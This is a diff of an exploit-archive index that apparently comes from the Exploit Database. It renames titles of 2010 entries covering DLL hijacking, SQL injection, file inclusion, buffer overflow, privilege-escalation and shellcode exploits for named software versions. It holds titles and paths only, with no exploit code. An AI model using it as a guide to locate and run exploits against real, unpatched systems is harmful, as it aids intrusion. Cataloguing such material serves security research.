14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 <= 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0 14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 DLL Hijacking Exploit (Wintab32.dll)",2010-08-25,storm,windows,local,0 -14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0 +14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0 14743,platforms/windows/local/14743.c,"avast! <= 5.0.594 license files DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0 14744,platforms/windows/local/14744.c,"Microsoft Visio 2003 DLL Hijacking Exploit (mfc71enu.dll)",2010-08-25,"Beenu Arora",windows,local,0 14745,platforms/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 DLL Hijacking Exploit (wab32res.dll)",2010-08-25,"Beenu Arora",windows,local,0 @@ -12896,7 +12894,7 @@ id,file,description,date,author,platform,type,port 14755,platforms/windows/local/14755.c,"Adobe Device Central CS5 DLL Hijacking Exploit (qtcf.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0 14758,platforms/windows/local/14758.c,"Microsoft Group Convertor DLL Hijacking Exploit (imm.dll)",2010-08-25,"Beenu Arora",windows,local,0 -14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader All Version Memory Corruption",2010-08-25,ItSecTeam,multiple,dos,0 +14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader All Version - Memory Corruption",2010-08-25,ItSecTeam,multiple,dos,0 14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll)",2010-08-25,Anonymous,windows,local,0 14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Encrypt3d.M!nd,windows,local,0 14765,platforms/windows/local/14765.c,"Mediaplayer Classic 1.3.2189.0 DLL Hijacking Exploit (iacenc.dll)",2010-08-25,Encrypt3d.M!nd,windows,local,0 @@ -12910,7 +12908,7 @@ id,file,description,date,author,platform,type,port 14774,platforms/windows/local/14774.c,"Cisco Packet Tracer 5.2 DLL Hijacking Exploit (wintab32.dll)",2010-08-25,CCNA,windows,local,0 14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 DLL Hijacking Exploit (ibfs32.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)",2010-08-25,storm,windows,local,0 -14779,platforms/windows/remote/14779.pl,"Deepin TFTP Server 1.25 Directory Traversal Vulnerability",2010-08-25,demonalex,windows,remote,0 +14779,platforms/windows/remote/14779.pl,"deepin tftp server 1.25 - Directory Traversal vulnerability",2010-08-25,demonalex,windows,remote,0 14780,platforms/windows/local/14780.c,"Windows Internet Communication Settings DLL Hijacking Exploit (schannel.dll)",2010-08-25,ALPdaemon,windows,local,0 14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 DLL Hijacking Exploit (HomeUtils9.dll)",2010-08-25,storm,windows,local,0 14782,platforms/windows/local/14782.c,"Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll)",2010-08-25,storm,windows,local,0 @@ -12926,28 +12924,28 @@ id,file,description,date,author,platform,type,port 14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 dll Hijacking exploit (color.dll)",2010-08-25,"xsploited security",windows,local,0 14795,platforms/bsd/shellcode/14795.c,"bds/x86-bindshell on port 2525 shellcode - 167 bytes",2010-08-25,beosroot,bsd,shellcode,0 14799,platforms/php/webapps/14799.txt,"osCommerce Online Merchant Remote File Inclusion Vulnerability",2010-08-26,LoSt.HaCkEr,php,webapps,0 -14801,platforms/php/webapps/14801.txt,"Atomic Photo Album 1.0.2 Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0 +14801,platforms/php/webapps/14801.txt,"atomic photo album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0 14802,platforms/php/webapps/14802.html,"Hycus CMS 1.0.1 Multiple Cross Site Request Forgery Vulnerabilities",2010-08-26,10n1z3d,php,webapps,0 14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection Vulnerability",2010-08-26,"Lord Tittis3000",php,webapps,0 14808,platforms/php/webapps/14808.pl,"mini CMS / News Script Light 1.0 Remote File Include Exploit",2010-08-26,bd0rk,php,webapps,0 -14809,platforms/php/webapps/14809.txt,"Kontakt Formular 1.1 Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0 -14810,platforms/php/webapps/14810.txt,"Gaestebuch 1.2 Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0 +14809,platforms/php/webapps/14809.txt,"kontakt formular 1.1 - Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0 +14810,platforms/php/webapps/14810.txt,"gaestebuch 1.2 - Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0 14811,platforms/php/webapps/14811.txt,"Joomla Component (com_remository) Remote Upload File",2010-08-26,J3yk0ob,php,webapps,0 14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0 14815,platforms/php/webapps/14815.txt,"pecio CMS 2.0.5 - Multiple Remote File Inclusion Vulnerabilities",2010-08-27,eidelweiss,php,webapps,0 -14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0 +14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0 14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield <= 1.5.1 Local/Remote Root Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0 14819,platforms/php/webapps/14819.html,"Pc4Uploader 9.0 Cross-site Request Forgery",2010-08-27,"RENO ",php,webapps,0 14820,platforms/php/webapps/14820.txt,"iGaming CMS Multiple SQL Injection Vulnerabilities",2010-08-27,Sweet,php,webapps,0 14821,platforms/asp/webapps/14821.txt,"Shop Creator 4.0 SQL Injection Vulnerability",2010-08-27,Pouya_Server,asp,webapps,0 14822,platforms/php/webapps/14822.txt,"DiY-CMS 1.0 Multiple Remote File Inclusion Vulnerabilities",2010-08-28,LoSt.HaCkEr,php,webapps,0 -14823,platforms/php/webapps/14823.txt,"Textpattern CMS 4.2.0 Remote File Inclusion Vulnerability",2010-08-28,Sn!pEr.S!Te,php,webapps,0 +14823,platforms/php/webapps/14823.txt,"textpattern cms 4.2.0 - Remote File Inclusion Vulnerability",2010-08-28,Sn!pEr.S!Te,php,webapps,0 14824,platforms/windows/dos/14824.txt,"Leadtools ActiveX Raster Twain 16.5 - (LtocxTwainu.dll) Buffer Overflow Vulnerability",2010-08-28,LiquidWorm,windows,dos,0 14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP SQL Injection Vulnerability",2010-08-28,Valentin,php,webapps,0 -14827,platforms/php/webapps/14827.py,"Blogman v0.7.1 (profile.php) SQL Injection Exploit",2010-08-28,"Ptrace Security",php,webapps,0 +14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - (profile.php) SQL Injection Exploit",2010-08-28,"Ptrace Security",php,webapps,0 14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 (article.php) SQL Injection Vulnerability",2010-08-28,[]0iZy5,php,webapps,0 14829,platforms/php/webapps/14829.txt,"CF Image Hosting Script 1.3 (settings.cdb) Information Disclosure Vulnerability",2010-08-28,Dr.$audi,php,webapps,0 -14830,platforms/linux/local/14830.py,"nginx v0.6.38 Heap Corruption Exploit",2010-08-29,"Aaron Conole",linux,local,0 +14830,platforms/linux/local/14830.py,"nginx 0.6.38 - Heap Corruption Exploit",2010-08-29,"Aaron Conole",linux,local,0 14831,platforms/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow Vulnerability (SEH)",2010-08-29,"James Fitts",windows,local,0 14832,platforms/windows/dos/14832.rb,"SnackAmp 3.1.2 - (.wav) Buffer Overflow Vulnerability (PoC)",2010-08-29,"James Fitts",windows,dos,0 14833,platforms/php/webapps/14833.txt,"vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability",2010-08-29,"Immortal Boy",php,webapps,0 @@ -12957,44 +12955,44 @@ id,file,description,date,author,platform,type,port 14838,platforms/php/webapps/14838.txt,"Seagull 0.6.7 SQL Injection Vulnerability",2010-08-29,Sweet,php,webapps,0 14839,platforms/php/webapps/14839.txt,"GuestBookPlus HTML Injection & Bypass Comments Limit",2010-08-29,"MiND C0re",php,webapps,0 14840,platforms/windows/dos/14840.py,"Mereo 1.9.2 - Remote HTTP Server Denial Of Service Vulnerability",2010-08-30,"CwG GeNiuS",windows,dos,0 -14841,platforms/php/webapps/14841.txt,"Seagull 0.6.7 Remote File Inclusion Vulnerability",2010-08-30,"FoX HaCkEr",php,webapps,0 +14841,platforms/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion Vulnerability",2010-08-30,"FoX HaCkEr",php,webapps,0 14843,platforms/windows/dos/14843.txt,"Apple QuickTime ""_Marshaled_pUnk"" Backdoor Param Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta",windows,dos,0 14845,platforms/php/webapps/14845.txt,"Joomla Component (com_picsell) Local File Disclosure Vulnerability",2010-08-30,Craw,php,webapps,0 14846,platforms/php/webapps/14846.txt,"Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities",2010-08-31,"Chip D3 Bi0s",php,webapps,0 14848,platforms/php/webapps/14848.txt,"Web-Ideas Web Shop Standard SQL Injection Vulnerability",2010-08-31,Ariko-Security,php,webapps,0 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0 -14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 Remote File Inclusion Vulnerability",2010-09-01,Andre_Corleone,php,webapps,0 -14852,platforms/windows/dos/14852.txt,"Leadtools ActiveX Common Dialogs 16.5 Multiple Remote Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0 +14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion Vulnerability",2010-09-01,Andre_Corleone,php,webapps,0 +14852,platforms/windows/dos/14852.txt,"leadtools activex common dialogs 16.5 Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0 14853,platforms/windows/remote/14853.py,"MOAUB #1 - Adobe Acrobat Reader and Flash Player “newclass” invalid pointer",2010-09-01,Abysssec,windows,remote,0 14854,platforms/php/webapps/14854.py,"MOAUB #1 - Cpanel PHP Restriction Bypass Vulnerability 0day",2010-09-01,Abysssec,php,webapps,0 -14856,platforms/windows/remote/14856.txt,"TFTPDWIN v0.4.2 Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0 -14857,platforms/windows/remote/14857.txt,"TFTP Desktop 2.5 Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0 +14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0 +14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal vulnerability",2010-09-01,chr1x,windows,remote,0 14858,platforms/windows/dos/14858.txt,"Autodesk MapGuide Viewer ActiveX Denial of Service Vulnerability",2010-09-01,d3b4g,windows,dos,0 14860,platforms/php/webapps/14860.txt,"PHP Joke Site Software (sbjoke_id) SQL Injection Vulnerability",2010-09-01,"BorN To K!LL",php,webapps,0 14866,platforms/novell/dos/14866.txt,"Novell Netware 6.5 - OpenSSH Remote Stack Overflow",2010-09-01,"Francis Provencher",novell,dos,0 14867,platforms/php/webapps/14867.txt,"vbShout 5.2.2 Remote/Local File Inclusion Vulnerability",2010-09-02,fred777,php,webapps,0 14869,platforms/windows/dos/14869.py,"MOAUB #2 - Apple QuickTime FlashPix NumberOfTiles Remote Code Execution Vulnerability",2010-09-02,Abysssec,windows,dos,0 -14870,platforms/asp/webapps/14870.txt,"MOAUB #2 - Rainbowportal Multiple Remote Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0 +14870,platforms/asp/webapps/14870.txt,"moaub #2 - rainbowportal Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0 14873,platforms/win32/shellcode/14873.asm,"Shellcode Checksum Routine",2010-09-02,dijital1,win32,shellcode,0 14875,platforms/multiple/remote/14875.txt,"Backdoor password in Accton-based switches (3com, Dell, SMC, Foundry and EdgeCore)",2010-09-02,"Edwin Eefting",multiple,remote,0 14876,platforms/php/webapps/14876.txt,"Shop a la Cart Multiple Vulnerabilities",2010-09-02,Ariko-Security,php,webapps,0 14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 ActiveX extSetOwner Remote Code Execution",2010-09-03,Abysssec,windows,remote,0 -14879,platforms/asp/webapps/14879.txt,"MOAUB #3 - Visinia 1.3 Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0 +14879,platforms/asp/webapps/14879.txt,"moaub #3 - visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0 14882,platforms/windows/dos/14882.txt,"FFDshow SEH Exception leading to NULL pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial Of Service Vulnerability",2010-09-03,"Matthew Bergin",windows,dos,0 14884,platforms/php/webapps/14884.txt,"smbind <= 0.4.7 - SQL Injection Vulnerability",2010-09-03,R00t[ATI],php,webapps,0 14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 ActiveX Remote Exploit (UfPBCtrl.DLL)",2010-11-17,Dr_IDE,windows,remote,0 14886,platforms/windows/remote/14886.py,"MOAUB #4 - Movie Maker Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 -14887,platforms/php/webapps/14887.txt,"MOAUB #4 - syndeocms 2.8.02 Multiple Vulnerabilities",2010-09-04,Abysssec,php,webapps,0 +14887,platforms/php/webapps/14887.txt,"moaub #4 - syndeocms 2.8.02 - Multiple Vulnerabilities",2010-09-04,Abysssec,php,webapps,0 14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit",2010-09-04,"Ptrace Security",php,webapps,0 14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS (sid) Blind SQL Injection Vulnerability",2010-09-04,"BorN To K!LL",php,webapps,0 14892,platforms/windows/dos/14892.py,"VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC",2010-09-04,"hadji samir",windows,dos,0 -14893,platforms/php/webapps/14893.txt,"PHP Classifieds 7.3 Remote File Inclusion Vulnerability",2010-09-04,alsa7r,php,webapps,0 +14893,platforms/php/webapps/14893.txt,"php classifieds 7.3 - Remote File Inclusion Vulnerability",2010-09-04,alsa7r,php,webapps,0 14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - (sources/search.php) SQL Injection Exploit",2010-09-05,"Ptrace Security",php,webapps,0 14895,platforms/windows/remote/14895.py,"MOAUB #5 - Microsoft MPEG Layer-3 Remote Command Execution Exploit",2010-09-05,Abysssec,windows,remote,0 -14896,platforms/php/webapps/14896.txt,"iJoomla Magazine 3.0.1 Remote File Inclusion Vulnerability",2010-09-05,LoSt.HaCkEr,php,webapps,0 -14897,platforms/php/webapps/14897.txt,"chillyCMS 1.1.3 Multiple Vulnerabilities",2010-09-05,"AmnPardaz ",php,webapps,0 -14898,platforms/asp/webapps/14898.txt,"MOAUB #5 - IfNuke Multiple Remote Vulnerabilities 0day",2010-09-05,Abysssec,asp,webapps,0 +14896,platforms/php/webapps/14896.txt,"ijoomla magazine 3.0.1 - Remote File Inclusion Vulnerability",2010-09-05,LoSt.HaCkEr,php,webapps,0 +14897,platforms/php/webapps/14897.txt,"chillycms 1.1.3 - Multiple Vulnerabilities",2010-09-05,"AmnPardaz ",php,webapps,0 +14898,platforms/asp/webapps/14898.txt,"moaub #5 - ifnuke Multiple Vulnerabilities 0day",2010-09-05,Abysssec,asp,webapps,0 14901,platforms/php/webapps/14901.txt,"Joomla Component Clantools 1.5 - Blind SQL Injection Vulnerability",2010-09-05,Solidmedia,php,webapps,0 14902,platforms/php/webapps/14902.txt,"Joomla Component Clantools 1.2.3 - Multiple Blind SQL Injection Vulnerability",2010-09-05,Solidmedia,php,webapps,0 14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 Local Buffer Overflow Proof of Concept",2010-09-05,0x6264,linux,dos,0 @@ -13005,42 +13003,42 @@ id,file,description,date,author,platform,type,port 14911,platforms/php/webapps/14911.sh,"Gantry Framework 3.0.10 (Joomla) Blind SQL Injection Exploit",2010-09-05,jdc,php,webapps,0 14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager Persistent XSS Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14914,platforms/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website SQL Injection Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 -14915,platforms/php/webapps/14915.txt,"MOAUB #6 - InterPhoto Gallery Multiple Remote Vulnerabilities",2010-09-06,Abysssec,php,webapps,0 +14915,platforms/php/webapps/14915.txt,"moaub #6 - interphoto gallery Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0 14916,platforms/windows/dos/14916.py,"MOAUB #6 - HP OpenView NNM webappmon.exe execvp_nc Remote Code Execution",2010-09-06,Abysssec,windows,dos,0 14919,platforms/asp/webapps/14919.txt,"Micronetsoft Rental Property Management Website SQL Injection Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14922,platforms/php/webapps/14922.txt,"Joomla Component Aardvertiser 2.1 Free Blind SQL Injection Vulnerability",2010-09-06,"Stephan Sattler",php,webapps,0 14923,platforms/php/webapps/14923.txt,"Wordpress Events Manager Extended Plugin Persistent XSS Vulnerability",2010-09-06,Craw,php,webapps,0 -14925,platforms/linux/remote/14925.txt,"Weborf <= 0.12.2 Directory Traversal Vulnerability",2010-09-07,Rew,linux,remote,0 -14927,platforms/php/webapps/14927.txt,"MOAUB #7 - DynPage <= 1.0 - Multiple Remote Vulnerabilities (0day)",2010-09-07,Abysssec,php,webapps,0 +14925,platforms/linux/remote/14925.txt,"weborf <= 0.12.2 - Directory Traversal vulnerability",2010-09-07,Rew,linux,remote,0 +14927,platforms/php/webapps/14927.txt,"moaub #7 - dynpage <= 1.0 - Multiple Vulnerabilities (0day)",2010-09-07,Abysssec,php,webapps,0 14928,platforms/novell/dos/14928.py,"MOAUB #7 - Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow",2010-09-07,Abysssec,novell,dos,0 -14931,platforms/php/webapps/14931.php,"Java Bridge v. 5.5 Directory Traversal Vulnerability",2010-09-07,Saxtor,php,webapps,0 +14931,platforms/php/webapps/14931.php,"java bridge v. 5.5 - Directory Traversal vulnerability",2010-09-07,Saxtor,php,webapps,0 14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0 14933,platforms/windows/webapps/14933.txt,"ColdBookmarks 1.22 SQL Injection Vulnerability",2010-09-07,mr_me,windows,webapps,0 14934,platforms/windows/webapps/14934.txt,"ColdOfficeView 2.04 Multiple Blind SQL Injection Vulnerabilities",2010-09-07,mr_me,windows,webapps,0 -14935,platforms/windows/webapps/14935.py,"ColdUserGroup 1.06 Blind SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0 +14935,platforms/windows/webapps/14935.py,"ColdUserGroup 1.06 - Blind SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0 14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 (.wav) Denial of Service Vulnerability",2010-09-07,"hadji samir",windows,dos,0 14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 Remote Buffer Overflow PoC",2010-09-07,eidelweiss,windows,dos,0 14941,platforms/win32/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow Exploit",2010-09-07,"Lincoln, Nullthreat, rick2600",win32,remote,80 -14942,platforms/php/webapps/14942.txt,"1024 CMS 2.1.1 Blind SQL Injection Vulnerability",2010-09-07,"Stephan Sattler",php,webapps,0 -14943,platforms/asp/webapps/14943.txt,"MOAUB #8 - Sirang Web-Based D-Control Multiple Remote Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0 +14942,platforms/php/webapps/14942.txt,"1024 CMS 2.1.1 - Blind SQL Injection Vulnerability",2010-09-07,"Stephan Sattler",php,webapps,0 +14943,platforms/asp/webapps/14943.txt,"moaub #8 - sirang web-based d-control Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0 14944,platforms/windows/local/14944.py,"MOAUB #8 - Microsoft Office Visio DXF File Stack based Overflow",2010-09-08,Abysssec,windows,local,0 14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0 -14948,platforms/php/webapps/14948.txt,"MOAUB #9 - FestOS CMS 2.3b Multiple Remote Vulnerabilities",2010-09-09,Abysssec,php,webapps,0 +14948,platforms/php/webapps/14948.txt,"moaub #9 - festos cms 2.3b Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps,0 14949,platforms/windows/dos/14949.py,"MOAUB #9 - Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability",2010-09-09,Abysssec,windows,dos,0 14952,platforms/php/webapps/14952.txt,"Visitors Google Map Lite 1.0.1 (FREE) module mod_visitorsgooglemap SQL Injection",2010-09-09,"Chip D3 Bi0s",php,webapps,0 -14954,platforms/asp/webapps/14954.txt,"MOAUB #10 - aradBlog Multiple Remote Vulnerabilities",2010-09-09,Abysssec,asp,webapps,0 +14954,platforms/asp/webapps/14954.txt,"moaub #10 - aradblog Multiple Vulnerabilities",2010-09-09,Abysssec,asp,webapps,0 14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0 14960,platforms/php/webapps/14960.txt,"ES Simple Download 1.0. Local File Inclusion Vulnerability",2010-09-09,Kazza,php,webapps,0 14961,platforms/win32/local/14961.py,"Audiotran 1.4.2.4 SEH Overflow Exploit",2010-09-09,"Abhishek Lyall",win32,local,0 14962,platforms/multiple/webapps/14962.txt,"CS Cart 1.3.3 (install.php) Cross Site Scripting Vulnerability",2010-09-09,crmpays,multiple,webapps,80 14964,platforms/php/webapps/14964.txt,"Joomla Component (com_jphone) Local File Inclusion Vulnerability",2010-09-10,"Chip D3 Bi0s",php,webapps,0 -14965,platforms/php/webapps/14965.txt,"FCMS 2.2.3 Remote File Inclusion Vulnerability",2010-09-10,LoSt.HaCkEr,php,webapps,0 +14965,platforms/php/webapps/14965.txt,"fcms 2.2.3 - Remote File Inclusion Vulnerability",2010-09-10,LoSt.HaCkEr,php,webapps,0 14966,platforms/windows/local/14966.py,"MOAUB #10 - Excel RTD Memory Corruption",2010-09-10,Abysssec,windows,local,0 14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0 -14968,platforms/php/webapps/14968.txt,"Symphony 2.0.7 Multiple Vulnerabilities",2010-09-10,JosS,php,webapps,0 +14968,platforms/php/webapps/14968.txt,"symphony 2.0.7 - Multiple Vulnerabilities",2010-09-10,JosS,php,webapps,0 14969,platforms/asp/webapps/14969.txt,"MOAUB #11 - ASP Nuke SQL Injection Vulnerability",2010-09-11,Abysssec,asp,webapps,0 14971,platforms/windows/dos/14971.py,"MOAUB #11 - Microsoft Office Word 2007 sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0 -14973,platforms/php/webapps/14973.txt,"piwigo-2.1.2 Multiple Vulnerabilities",2010-09-11,Sweet,php,webapps,0 +14973,platforms/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,php,webapps,0 14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 Multiple Modules NULL Pointer Dereference DoS",2010-09-11,d0lc3,windows,dos,0 14976,platforms/linux/remote/14976.txt,"YOPS Web Server Remote Command Execution",2010-09-11,"Rodrigo Escobar",linux,remote,0 14977,platforms/php/webapps/14977.txt,"MyHobbySite 1.01 SQL Injection and Authentication Bypass Vulnerability",2010-09-12,"YuGj VN",php,webapps,0 @@ -13059,25 +13057,25 @@ id,file,description,date,author,platform,type,port 14996,platforms/php/webapps/14996.txt,"Storyteller CMS (var) Local File Inclusion Vulnerability",2010-09-13,"BorN To K!LL",php,webapps,0 14997,platforms/php/webapps/14997.txt,"UCenter Home 2.0 SQL Injection Vulnerability",2010-09-13,KnocKout,php,webapps,0 14998,platforms/php/webapps/14998.txt,"Joomla Component (com_jgen) SQL Injection Vulnerability",2010-09-14,**RoAd_KiLlEr**,php,webapps,0 -14999,platforms/asp/webapps/14999.txt,"MOAUB #14 - FreeDiscussionForums 1.0 - Multiple Remote Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0 +14999,platforms/asp/webapps/14999.txt,"moaub #14 - freediscussionforums 1.0 - Multiple Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0 15001,platforms/windows/remote/15001.html,"MOAUB #14 - Novell iPrint Client Browser Plugin ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,windows,remote,0 15004,platforms/php/webapps/15004.pl,"E-Xoopport - Samsara <= 3.1 - (Sections Module) Remote Blind SQL Injection Exploit",2010-09-14,_mRkZ_,php,webapps,0 15005,platforms/multiple/remote/15005.txt,"IBM Lotus Domino iCalendar Email Address Stack Buffer Overflow Vulnerability",2010-09-14,"A. Plaskett",multiple,remote,0 15006,platforms/php/webapps/15006.txt,"eNdonesia 8.4 SQL Injection Vulnerability",2010-09-15,vYc0d,php,webapps,0 15008,platforms/windows/dos/15008.py,"MOAUB #15 - Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption",2010-09-15,Abysssec,windows,dos,0 -15011,platforms/php/webapps/15011.txt,"MOAUB #15 - PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities",2010-09-15,Abysssec,php,webapps,0 +15011,platforms/php/webapps/15011.txt,"moaub #15 - php microcms 1.0.1 Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0 15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH exploit",2010-09-15,"sanjeev gupta",windows,local,0 15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0 15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0 15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 .mp3 and .wma Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0 -15018,platforms/asp/webapps/15018.txt,"MOAUB #16 - mojoportal Multiple Remote Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0 +15018,platforms/asp/webapps/15018.txt,"moaub #16 - mojoportal Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0 15019,platforms/windows/dos/15019.txt,"MOAUB #16 - Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0 15022,platforms/windows/local/15022.py,"Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0 15023,platforms/linux/local/15023.c,"x86_64 Linux Kernel ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0 15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27+ x86_64 compat exploit",2010-09-16,Ac1dB1tCh3z,linux,local,0 15026,platforms/windows/local/15026.py,"BACnet OPC Client Buffer Overflow Exploit",2010-09-16,"Jeremy Brown",windows,local,0 15027,platforms/windows/dos/15027.py,"MOAUB #17 - Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution",2010-09-17,Abysssec,windows,dos,0 -15029,platforms/php/webapps/15029.txt,"MOAUB #17 - phpmyfamily Multiple Remote Vulnerabilities",2010-09-17,Abysssec,php,webapps,0 +15029,platforms/php/webapps/15029.txt,"moaub #17 - phpmyfamily Multiple Vulnerabilities",2010-09-17,Abysssec,php,webapps,0 15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0 15032,platforms/windows/dos/15032.py,"MediaHuman Music Converter 1.0.1 .wav and .mp3 Denial of Service Vulnerability",2010-09-17,modpr0be,windows,dos,0 15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0 @@ -13088,20 +13086,20 @@ id,file,description,date,author,platform,type,port 15040,platforms/php/webapps/15040.txt,"Joomla Component (com_restaurantguide) Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0 